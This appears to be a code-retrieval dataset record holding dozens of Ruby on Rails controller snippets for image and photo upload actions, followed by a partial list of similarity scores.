"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to aquarium_images_url, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created }\n else\n format.html { render action: 'new' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n @item.images.delete_all\n unless params.require(:item)[:images_id].nil?\n params.require(:item)[:images_id].each do |id|\n image = Image.find_by_id(id)\n (@item.images << image) unless image.nil?\n end\n end\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def image_callback\n @image = Image.create(image_params)\n @lecture.update(image: @image)\n end",
"def create\n @gallery = find_gallery\n @gallery.save! unless @gallery.persisted?\n @image = Image.new params[:image]\n @image.image_gallery_id = @gallery.id\n @images = @gallery.images\n \n respond_to do |format|\n if @image.save \n format.js\n format.json { render json: @image, status: :created, location: @image }\n else\n format.js\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image_collection = ImageCollection.new(image_collection_params)\n\n respond_to do |format|\n if @image_collection.save\n image_collection_params[:attached_images].reject(&:empty?).each do |id|\n @image_collection.images << Image.find(id)\n end\n\n @image_collection.save\n\n format.html { redirect_to @image_collection, notice: 'Image collection was successfully created.' }\n format.json { render :show, status: :created, location: @image_collection }\n else\n format.html { render :new }\n format.json { render json: @image_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def create\n @animal_image = AnimalImage.new(animal_image_params)\n\n respond_to do |format|\n if @animal_image.save\n format.html { redirect_to @animal_image, notice: \"Animal image was successfully created.\" }\n format.json { render :show, status: :created, location: @animal_image }\n else\n format.html { render :new }\n format.json { render json: @animal_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n image = PropertyImage.new()\n image.photo = params[:file]\n image.property_form = @property_form\n if image.save\n respond_to do |format|\n format.json do\n json = {id: image.id}\n render json: json\n end\n end\n end\n end",
"def create\n @icesled = Icesled.new(icesled_params)\n @icesled.manufacturer_id ||= Manufacturer.where(name: 'не указан', category: 'icesled').first_or_create.id\n respond_to do |format|\n if @icesled.save\n if params[:images]\n @icesled.gallery ||= Gallery.new\n params[:images].each do |image|\n @icesled.gallery.images.create(image: image)\n end\n unless @icesled.image_file_size\n @icesled.update(image: @icesled.gallery.images.first.image)\n end\n end\n format.html { redirect_to @icesled, notice: 'Icesled was successfully created.' }\n format.json { render :show, status: :created, location: @icesled }\n else\n format.html { render :new }\n format.json { render json: @icesled.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n if (image!=nil)\n @apartment.pictures.create(image: image)\n \n end\n }\n end\n format.html { redirect_to @apartment, notice: 'La propiedad se actualizo correctamente.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @sub_collection = SubCollection.new(sub_collection_params)\n\n respond_to do |format|\n if @sub_collection.save\n if not sub_collection_images_params[:sub_collection_images_attributes].nil?\n sub_collection_images_params[:sub_collection_images_attributes].each do |sci|\n @sub_collection.sub_collection_images.create(sub_collection_image: sci[:sub_collection_image])\n end\n end\n format.html { redirect_to @sub_collection, notice: 'Sub collection was successfully created.' }\n format.json { render :show, status: :created, location: @sub_collection }\n else\n @sub_collection.sub_collection_images.build\n format.html { render :new }\n format.json { render json: @sub_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @imageable = find_imageable\n @image = @imageable.images.build(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: t('.notice', image: @image) }\n format.json\n else\n format.html { render :new }\n format.json {\n render json: @image.errors[:attachment], status: :unprocessable_entity\n }\n end\n end\n end",
"def create\n @photos = Photo.new(photos_params)\n if @photos.save\n render json: { id: @photos.id, url: @photos.gallery.url,\n size: @photos.gallery_file_size }\n else\n render json: { id: nil }\n end\n end",
"def create\n @vmimage = Vmimage.new(vmimage_params)\n # p \"debug\"\n # p vmimage_params\n # @vmimage.tag_list.add(vmimage_params.tag_list)\n respond_to do |format|\n if @vmimage.save\n format.html { redirect_to @vmimage, notice: 'Vmimage was successfully created.' }\n format.json { render action: 'show', status: :created, location: @vmimage }\n else\n format.html { render action: 'new' }\n format.json { render json: @vmimage.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_img\n result = RestaurantManage.upload_img(@restaurant, params[:qqfile], request.body.read)\n get_restaurant()\n render json: result\n end",
"def update\n @variant_image = VariantImage.find(params[:id])\n\n respond_to do |format|\n if @variant_image.update_attributes(params[:variant_image])\n format.html { redirect_to @variant_image, notice: 'Variant image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_remote\n img = {}\n data = {}\n if params[:data].present?\n data = JSON.parse(params[:data]).symbolize_keys\n img = data[:image].symbolize_keys\n else\n img = params[:image]\n end\n model = @imageable.class\n former_image = @imageable.respond_to?(:images) ? nil : @imageable.image\n kind = img[:kind]\n kind = model::IMAGE_KINDS.keys.first if kind.blank? && model.const_defined?(:IMAGE_KINDS)\n image = Image.new(imageable: @imageable, kind: kind, legend: img[:legend].to_s, zoomable: (img[:zoomable].present? ? img[:zoomable] : true))\n if Figaro.env.s3_enabled.to_bool\n # Special field for carrierwave_direct's business\n image.img.key = data[:key]\n end\n if request.xhr?\n if image.save_and_process!\n former_image.try :destroy if former_image\n #image[:url] = image.img.url\n return render(json: image, status: :ok)\n end\n Rails.logger.error \"[Image Creation Error #{Time.zone.now.xmlschema}] #{image.errors.full_messages}\"\n errors = image.errors[:img]\n render json: [{ error: errors }], status: :error\n else\n if image.save_and_process!\n former_image.try :destroy if former_image\n #image[:url] = image.img.url\n if Figaro.env.s3_enabled.to_bool && Figaro.env.js_upload_enabled.to_bool && Figaro.env.js_s3_iframe_enabled.to_bool\n return render(nothing: true)\n end\n return redirect_to({ action: :assist, id: image })\n end\n Rails.logger.error \"[Image Creation Error #{Time.zone.now.xmlschema}] #{image.errors.full_messages}\"\n redirect_to parent_url, alert: \"L’image n’a pas pu être créée\"\n end\n end",
"def create\n @image = Image.new(params[:image])\n type = @image.url_type\n #response.headers[\"Content-type\"] = \"text/plain\"\n if @image.save\n render :text => [ @image.to_jq_upload(type, \"image\") ].to_json.to_s\n else \n render :text => [ @image.to_jq_upload(type, \"image\").merge({ :error => \"custom_failure\" }) ].to_json.to_s\n end\n end",
"def create\n @gallery = find_gallery\n @gallery.save! unless @gallery.persisted?\n @image = Image.new image_params\n @image.image_gallery_id = @gallery.id\n\n respond_to do |format|\n if @image.save\n format.js\n format.json { render json: @image, status: :created, location: @image }\n else\n format.js\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_multiple_images(product_id, variation_id, images_path, images_name)\n response, status = BeyondApi::Request.upload_by_form(@session,\n \"/products/#{product_id}/variations/#{variation_id}/images\",\n images_path,\n file_name: images_name)\n\n handle_response(response, status)\n end",
"def upload_new_image_file(detection_flags, image = {})\n @client.post \"/service_json_ssl.svc/UploadNewImage_File\", {detection_flags:detection_flags,imagefile_data:image[:data],original_filename:image[:original_filename]}\n end",
"def create\n\n post = Post.new(post_params)\n post.location = Location.create(name: params[:post][:location][:name], lat: params[:post][:location][:lat], long: params[:post][:location][:long])\n if post.save\n params[:post][:images].each do |i|\n img = Image.find(i[:id])\n img.update(active: 1, post_id: post.id)\n end\n\n render json: {\n status: \"success\",\n data: post.as_json(\n include: [\n {\n user:\n {\n only: [:id, :name, :avatar]\n }\n },\n :location,\n {\n images: {\n only: [:id, :src]\n }\n },\n :rates\n ])}, status: :ok\n\n else\n render json: post.errors, status: 404\n end\n end",
"def create\n params[:exercise_medium_image][:token] = params[:exercise_medium_id]\n @exercise_image = case @exercise.blank?\n when true\n ExerciseMediumImage.new(params[:exercise_medium_image])\n when false\n @exercise.exercise_images.new(params[:exercise_medium_image])\n end\n \n # Won't validate so we avoid carrierwave error checking\n if @exercise_image.save(:validate=>false)\n file_name = ActiveRecord::Base.sanitize(params[:exercise_medium_image][:image])\n\n # Manually update exercise so we avoid carrierwave\n ActiveRecord::Base.connection.execute(\"update exercise_images set image=\" + file_name+ \" where id=\" + @exercise_image.id.to_s)\n @exercise_image.reload\n # Maybe reprocess the image to get thumbnails?? Naaah\n\n render json: @exercise_image, status: :created\n else\n render json: @exercise_image.errors.full_messages, status: :unprocessable_entity\n end\n \n end",
"def create\n # @taxi_photo = TaxiPhoto.new(taxi_photo_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @tour_photo = TourPhoto.new(image:image)\n @tour_photo.save\n }\n \n end\n redirect_to \"/tour_photos/gallery\"\n end",
"def create\n @car = Car.new(car_params)\n\n respond_to do |format|\n if @car.save\n params[:photos]['image'].each do |p|\n @photo = @car.photos.create!(:image => p, :car_id => @car.id)\n end\n format.html { redirect_to @car, notice: 'Car was successfully added.' }\n format.json { render :show, status: :created, location: @car }\n else\n format.html { render :new }\n format.json { render json: @car.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n # original code\n\n # @image_set = ImageSet.create(image_set_params)\n\n # render json: @image_set\n\n# code for imageMagick\n @image_set = current_user.image_sets.guild(image_set_params)\n authorize @image_set\n if @image_set.save\n # to handle multiple image upload on create\n if params[:images]\n params[:images].each {|image|\n @image_set.images.create(image: image)\n }\n end\n flash[:notice] = \"Your image set has been created.\"\n redirect_to @image_set\n else\n flash[:alert] = \"Something went wrong.\"\n render 'new'\n end\n\n end",
"def create\n @sku = Sku.new(params[:sku])\n @photo = Photo.new\n respond_to do |format|\n if @sku.save\n format.html { redirect_to @sku, notice: 'Sku was successfully created.' }\n format.json { render json: @sku, status: :created, location: @sku }\n else\n format.html { render action: \"new\" }\n format.json { render json: @sku.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @upload_preview = UploadPreview.new(params[:upload_preview])\n \n if @upload_preview.save\n render :json => {:img_path => @upload_preview.img.url.to_s,:id=>@upload_preview.id, \n :name => @upload_preview.img.instance.attributes[\"img_file_name\"]}, :content_type => 'text/html' \n else\n render :json => {:result => 'error'}, :content_type => 'text/html'\n end\n end",
"def upload_image\n image_file = ImageFile.new(params)\n\n delete_image() unless @collection.image.nil?\n\n @image = @collection.build_image({ extension: image_file.extension })\n\n unless @image.save\n render json: @image.errors, status: :unprocessable_entity; return\n end\n\n image_file.name = @image._id\n image_processor = CollectionImageProcessor.new(collection_id, image_file)\n\n if image_processor.save_image\n render json: @collection, status: :ok#, location: @collection\n else\n render json: image_processor.errors, status: :unprocessable_entity\n end\n end",
"def create\n @image_tag = ImageTag.new(process_params)\n\n respond_to do |format|\n if @image_tag.save\n format.html { redirect_to @image_tag, notice: 'Image tag was successfully created.' }\n format.json { render :show, status: :created, location: @image_tag }\n else\n format.html { render :new }\n format.json { render json: @image_tag.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n\n if @post.save && params[:images]\n params[:images].each { |image|\n @post.images.create(image: image)\n }\n end\n\n redirect_to @post\n end",
"def create\n @vehicle_type = VehicleType.new(vehicle_type_params)\n\n respond_to do |format|\n if @vehicle_type.save\n images\n\n format.html { redirect_to @vehicle_type, notice: 'Vehicle type was successfully created.' }\n format.json { render json: @vehicle_type, status: :created }\n else\n format.html { render action: 'new' }\n format.json { render json: @vehicle_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @gallery = Gallery.new(gallery_params)\n\n respond_to do |format|\n if @gallery.save\n if params[:images]\n params[:images].each { |image|\n pic = @gallery.pics.create(image: image)\n data = Cloudinary::Uploader.upload(image,@auth)\n pic.public_id = data['secure_url']\n pic.image_file_size = data['bytes']\n pic.save\n }\n end\n\n format.html { redirect_to @gallery, notice: 'Gallery was successfully created.' }\n format.json { render json: @gallery, status: :created, location: @gallery }\n else\n format.html { render action: \"new\" }\n format.json { render json: @gallery.errors, status: :unprocessable_entity }\n end\n end\n end",
"def variant_params\n params.require(:variant).permit(:sku, :product_id, :position, :price, :variant_price, option_value_ids: [], assets_attributes: [:id, :image, :_destroy])\n end",
"def create\n @truck = Truck.new(truck_params)\n\n if @truck.images.count>0\n @truck.images.attach(params[:truck][:images])\n end\n\n respond_to do |format|\n if @truck.save\n format.html { redirect_to @truck, notice: 'Truck was successfully created.' }\n format.json { render :show, status: :created, location: @truck }\n else\n format.html { render :new }\n format.json { render json: @truck.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # @tag = Tag.new(tag_params)\n @tag = Tag.new(:name => params[:name], :image_id => params[:image_id])\n @image = @tag.image\n\n respond_to do |format|\n if @tag.save\n format.js { render :layout => false }\n else\n format.js { render :layout => false }\n end\n end\n end",
"def create\n request_image = params[:image]\n url_hash = SecureRandom.urlsafe_base64(6)\n name = url_hash + \"-\" + request_image.original_filename.downcase\n\n File.open(\"#{Rails.root}/public/theta/#{name}\", 'wb') do |f|\n f.write(request_image.read)\n end\n\n theta = Theta.create!(url_hash: url_hash, image_url: name)\n render json: {url: \"http://www.rakugaki.tk/h/#{theta.url_hash}\"}, status: 201\n end",
"def create\n @album = Album.new(params[:album])\n \n respond_to do |format|\n images = [params[:images]].flatten\n @album.images << Image.find(images) unless images[0].nil?\n \n if @album.save\n format.html { redirect_to(albums_path, :notice => 'Album was successfully created.') }\n format.xml { render :xml => albums_path, :status => :created, :location => @album }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @album.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n #debugger\n blog = blog_params[:name]\n @user = User.find(session[:user_id])\n\n params[:image][:attached_assets_attrs].each do |item|\n ImgGroup.post item[:asset], @user, blog\n end\n\n respond_to do |format|\n format.html { render action: 'done' }\n format.json { render text: 'All posted.', status: :created, location: @image }\n end\n end",
"def create\n @family_image = FamilyImage.new(family_image_params)\n\n if @family_image.save\n render json: @family_image, status: :created, location: @family_image\n else\n render json: @family_image.errors, status: :unprocessable_entity\n end\n end",
"def destroy\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n @variant_image.destroy\n\n respond_to do |format|\n format.html { redirect_to @variant.product }\n format.json { head :ok }\n end\n end",
"def create\n @recipe_image_form = RecipeImageForm.new(recipe_image_params)\n\n respond_to do |format|\n if recipe_image = @recipe_image_form.save\n format.html { redirect_to @recipe_image_form.recipe, notice: 'Recipe image was successfully created.' }\n format.json { render :show, status: :created, location: recipe_image }\n else\n format.html { render :new }\n format.json { render json: @recipe_image_form.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_images\n\t\tif @current_user.present?\n\t\t\t@property = Property.find(params[:property_id])\n\t\t\tif @property.present?\n\t\t\t\t# if @property.images.present?\n\t\t\t\t# \t@property.images.destroy_all\n\t\t\t\t# end\n\t\t\t\tparams[:images].each { |image|\n\t i = @property.images.create(image: image)\n\t if i.save\n\t else\n\t \trender_json({\"status\" => \"Fail\", \"message\" => i.errors.full_messages.first}.to_json)\n\t \treturn\n\t end\n\t }\n\t @property.images.first.update_attributes(is_starred: true)\n\t render :file => 'api/v1/property/add_image'\n\t else\n\t \trender_json({\"status\" => \"Fail\", \"message\" => \"No property found.\"}.to_json)\n\t end\n\t\tend\n\tend",
"def create\n msg = \"\"\n if params[:client_images].present?\n params[:client_images].split(\",\").each do |image_ur|\n if @client.client_images.where(stage_id: params[:client_image][:stage_id]).count < 10\n params[:client_image][:file] = image_ur\n client_image = @client.client_images.new(client_image_params)\n client_image.save\n else\n msg = \"Client has only 10 client images per stage\"\n break\n end\n end\n else\n msg = \"Please choose the images\"\n end\n\n notice = msg.present? ? msg : \"Client images were successfully created.\"\n\n if params[:manage_image]\n respond_to do |format|\n format.html { redirect_to client_client_images_path(params[:client_id], stage_id: params[:client_image][:stage_id]), notice: notice }\n # format.json { render :show, status: :created, location: @client_image }\n end\n else\n respond_to do |format|\n format.html { redirect_to redirect_panel_path, notice: notice }\n # format.json { render :show, status: :created, location: @client_image }\n end\n end\n end",
"def create\n @listing = current_admin.listings.build(listing_params)\n\n respond_to do |format|\n if @listing.save\n\n if params[:pictures]\n #===== The magic is here ;)\n params[:pictures].each { |image|\n @listing.pictures.create(file: image)\n }\n end\n\n format.html { redirect_to admin_listings_url, notice: 'Listing was successfully created.' }\n format.json { render :show, status: :created, location: @listing }\n else\n format.html { render :new }\n format.json { render json: @listing.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_image\n image_url = @row[:image]\n return if image_url.blank?\n\n variant = Spree::Variant.find_by(is_master: true, product_id: @product.id)\n raise 'Product variant not found' unless variant\n\n image = Spree::Image.find_or_initialize_by viewable_id: variant.id\n return if image.id\n\n local_image = get_local_image image_url\n image.attachment = File.open(local_image, 'r')\n image.viewable_type = 'Spree::Variant'\n image.save\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: \"Image was successfully created.\" }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @picture = Picture.create!(picture_params)\n render json: @picture, status: :created\n end",
"def create\n @image_to_sample = ImageToSample.new(image_to_sample_params)\n\n respond_to do |format|\n if @image_to_sample.save\n format.html { redirect_to @image_to_sample, notice: 'Image to sample was successfully created.' }\n format.json { render action: 'show', status: :created, location: @image_to_sample }\n else\n format.html { render action: 'new' }\n format.json { render json: @image_to_sample.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n @image.user_token = @user_token\n\n respond_to do |format|\n params_hash = image_params\n if not params_hash[:aspect_ratio]\n @image.errors.add(:url, \"Must be a valid URL to an image\")\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n elsif @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @picture = Picture.new(picture_params)\n\n if @picture.save\n @picture.update(foodscape_id: params[:foodscape_id])\n render json: @picture, status: :created\n else\n render json: @picture.errors, status: :unprocessable_entity\n end\n end",
"def create\n @dog = Dog.new(dog_params)\n\n respond_to do |format|\n if @dog.save\n @dog.images.attach(params[:dog][:image]) if params[:dog][:image].present?\n\n format.html { redirect_to @dog, notice: 'Dog was successfully created.' }\n format.json { render :show, status: :created, location: @dog }\n else\n format.html { render :new }\n format.json { render json: @dog.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @sample_photo = SamplePhoto.new(sample_photo_params)\n\n\n if @sample_photo.save\n render json: @sample_photo, status: :created\n else\n render json: @sample_photo.errors, status: :unprocessable_entity\n end\n end",
"def add_images\n @parent = get_parent(params[:parent_id])\n\n #Images to Add\n if(!@parent.images.nil?)\n @parent.images.clear\n end\n if(!params[:Image_ids].nil?)\n for id in params[:Image_ids]\n @parent.images.push(Image.find(id))\n end\n end\n respond_to do |format|\n if @parent.save\n #Uses a session variable for reloading the current page assigned to the variable\n format.html { redirect_to session[:rq], notice: 'Image(s) successfully added.' }\n format.json { render json: @parent, status: :created, location: @parent }\n else\n format.html { render action: \"\" }\n format.json { render json: @parent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @taxi_image = TaxiImage.new(taxi_image_params)\n\n respond_to do |format|\n if @taxi_image.save\n format.html { redirect_to @taxi_image, notice: 'Taxi image was successfully created.' }\n format.json { render :show, status: :created, location: @taxi_image }\n else\n format.html { render :new }\n format.json { render json: @taxi_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n flash[:success] = 'Image was successfully created.'\n format.html { redirect_to new_admin_image_preview_url(image_id: @image.id) }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @rent.update(rent_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n \n format.html { redirect_to @rent, notice: 'Rent was successfully updated.' }\n format.json { render :show, status: :ok, location: @rent }\n else\n format.html { render :edit }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image_attrib = ImageAttrib.new(image_attrib_params)\n\n if @image_attrib.save\n render :show, status: :created, location: @image_attrib\n else\n render json: @image_attrib.errors, status: :unprocessable_entity\n end\n end",
"def variants\n VARIANTS.keys.map do |size|\n CreateImage.new(attributes.merge(size: size, disabled: size != 'large'))\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(params[:image])\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render json: @image, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@experience_image = ExperienceImage.new(experience_image_params)\n logger.debug \"The params coming in are:#{params.inspect}\"\n @experience_image = ExperienceImage.new(experience_image_params)\n logger.debug \"The file created is: #{@experience_image.inspect}\"\n\n\n respond_to do |format|\n if @experience_image.save\n format.json{ render :json => @experience_image }\n else\n format.json { render json: @experience_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def create\n @slider_image = SliderImage.new(params[:slider_image])\n\n respond_to do |format|\n if @slider_image.save\n format.html { redirect_to @slider_image, notice: 'Slider image was successfully created.' }\n format.json { render json: @slider_image, status: :created, location: @slider_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @slider_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @product = Product.new(product_params)\n @product.images.attach(params[:product][:images]) if params[:product][:images]\n\n respond_to do |format|\n if @product.save\n format.html { redirect_to seller_product_path(current_seller.id, @product.id), notice: 'Product was successfully created.' }\n format.json { render :show, status: :created, location: @product }\n else\n format.html { render :new }\n format.json { render json: @product.errors, status: :unprocessable_entity }\n end\n end\n end",
"def set_viewable\n viewable_id = params[:image][:viewable_id]\n\n if viewable_id.is_a?(Hash)\n @product.errors.add(:attachment, 'Erro')\n option_values_array = viewable_id.map {|option_type, option_values| option_values.map(&:to_i) }\n option_values_combinations = option_values_array.shift\n option_values_array.each do |option_value|\n option_values_combinations = option_values_combinations.product(option_value)\n end\n option_values_combinations = option_values_combinations.map(&:flatten) if option_values_combinations.count > 1\n\n @product.variants.each do |variant|\n option_values_combinations.each do |ov_combination|\n variant_option_ids = variant.option_values.pluck(:id)\n\n if ([ov_combination].flatten - variant_option_ids).empty?\n create_image(variant, permitted_resource_params)\n end\n end\n end\n else\n viewable_id = params[:master_option] if params[:master_option]\n @image.viewable_type = 'Spree::Variant'\n @image.viewable_id = viewable_id\n end\n end",
"def create\n @product = Product.new(name: product_params[:name], description: product_params[:description], product_type: product_params[:product_type],\n dimensions: product_params[:dimensions], weight: product_params[:weight], material: product_params[:material], product_code: product_params[:product_code],\n is_new_release: product_params[:is_new_release], collection_id: product_params[:collection_id], sub_collection_id: product_params[:sub_collection_id])\n respond_to do |format|\n if product_params[:product_images_attributes]\n product_params[:product_images_attributes].each do |pia|\n @product_image = ProductImage.new(product_image: pia[:product_image], product_id: Product.last.id+1)\n if not @product_image.valid?\n format.html { render :new }\n format.json { render json: @product_image.errors, status: :unprocessable_entity }\n break\n end\n end\n end\n if @product.save\n # if product_params[:product_images_attributes]\n # product_params[:product_images_attributes].each do |pi|\n # @product.product_images.create(product_image: pi[:product_image])\n # end\n # end\n format.html { redirect_to @product, notice: 'Product was successfully created.' }\n format.json { render :show, status: :created, location: @product }\n else\n format.html { render :new }\n format.json { render json: @product.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @variant = @product.variants.new(params.require(:variant).permit!)\n @variant.price = params[:variant][:price]\n respond_to do |format|\n if @variant.save\n format.html { redirect_to admin_product_variants_url(@product), notice: 'Variant was successfully created.' }\n format.json { render action: 'show', status: :created, location: @variant }\n else\n format.html { render action: 'new' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.html { redirect_to @image, notice: 'Image was successfully created.' }\n format.json { render action: 'show', status: :created, location: @image }\n else\n format.html { render action: 'new' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @property_image = PropertyImage.new(params[:property_image])\n\n respond_to do |format|\n if @property_image.save\n format.html { redirect_to property_images_path, notice: 'Property image was successfully created.' }\n format.json { render json: @property_image, status: :created, location: @property_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @property_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @event = Event.new(event_params)\n\n tag_array = event_params2['tags'].split(',')\n tag_array.each do |x|\n @tag = Tag.create(desc: x)\n @event.tags << @tag\n end\n EventTag.create(event_id: @event.id, tag_id: @tag.id)\n\n respond_to do |format|\n if @event.save\n params[:event]['images'].each do |a|\n @event_photo = @event.event_photos.create!(:image => a, :event_id => @event.id)\n end\n format.html { redirect_to @event, notice: 'Event was successfully created.' }\n format.json { render :show, status: :created, location: @event }\n else\n format.html { render :new }\n format.json { render json: @event.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.65627486",
"0.65037525",
"0.6433147",
"0.64226496",
"0.6414937",
"0.6413051",
"0.63565314",
"0.6343757",
"0.6338299",
"0.6301123",
"0.6272123",
"0.62499154",
"0.6220626",
"0.617524",
"0.617524",
"0.61609745",
"0.6148033",
"0.612654",
"0.60613704",
"0.6023113",
"0.6020223",
"0.6009458",
"0.5978584",
"0.5964849",
"0.59534657",
"0.59323245",
"0.59259784",
"0.5909164",
"0.5909056",
"0.58957505",
"0.5894166",
"0.58881384",
"0.5864165",
"0.58436656",
"0.5843072",
"0.5841127",
"0.58382344",
"0.58250034",
"0.5817412",
"0.58104247",
"0.5800983",
"0.57990646",
"0.57954305",
"0.57934153",
"0.57908756",
"0.5785248",
"0.5777396",
"0.57694626",
"0.5767351",
"0.57613844",
"0.5760114",
"0.5756075",
"0.57540387",
"0.5752588",
"0.5749607",
"0.5745982",
"0.57451725",
"0.57432467",
